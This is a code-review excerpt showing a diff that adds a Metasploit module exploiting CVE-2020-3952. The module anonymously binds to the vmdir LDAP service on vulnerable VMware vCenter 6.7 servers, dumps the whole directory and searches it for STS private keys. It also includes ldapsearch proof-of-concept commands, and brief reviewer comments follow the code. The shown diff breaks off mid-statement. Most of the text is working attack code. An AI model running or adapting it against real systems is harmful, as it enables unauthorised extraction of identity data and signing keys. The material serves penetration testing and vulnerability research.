modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb

```diff
@@ -0,0 +1,126 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::LDAP
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMware vCenter Server vmdir Information Disclosure',
+        'Description' => %q{
+          This module uses an anonymous-bind LDAP connection to dump data from the
+          vmdir service in VMware vCenter Server version 6.7 prior to the 6.7U3f
+          update.
+        },
+        'Author' => [
+          # Discovered by unknown researcher(s)
+          'wvu' # Module
+        ],
+        'References' => [
+          ['CVE', '2020-3952'],
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0006.html']
+        ],
+        'DisclosureDate' => '2020-04-09', # Vendor advisory
+        'License' => MSF_LICENSE,
+        'Actions' => [['Dump', 'Description' => 'Dump all LDAP data']],
+        'DefaultAction' => 'Dump',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_advanced_options([
+      OptFloat.new('ConnectTimeout', [false, 'Timeout for LDAP connect', 10.0])
+    ])
+  end
+
+  def base_dn
+    @base_dn || 'dc=vsphere,dc=local'
+  end
+
+  def policy_dn
+    "cn=password and lockout policy,#{base_dn}"
+  end
+
+  # PoC using ldapsearch(1):
+  #
+  # Retrieve root DSE with base DN:
+  #   ldapsearch -xb "" -s base -H ldap://[redacted]
+  #
+  # Dump data using discovered base DN:
+  #   ldapsearch -xb dc=vsphere,dc=local -H ldap://[redacted]
+  def run
+    opts = {
+      host: rhost,
+      port: rport,
+      connect_timeout: datastore['ConnectTimeout']
+    }
+
+    entries = nil
+
+    Net::LDAP.open(opts) do |ldap|
+      print_status('Discovering base DN automatically')
+
+      unless (@base_dn = discover_base_dn(ldap))
+        print_warning('Falling back on default base DN of dc=vsphere,dc=local')
+      end
+
+      print_status("Dumping LDAP data from vmdir service at #{peer}")
+      entries = ldap.search(base: base_dn)
+    end
+
+    # Look for an entry with a non-empty vmwSTSPrivateKey attribute
+    unless entries&.find { |entry| entry[:vmwstsprivatekey].any? }
```

Comment:
Good idea, works well!

Reply:
I wasn't able to test this. :(

So thanks!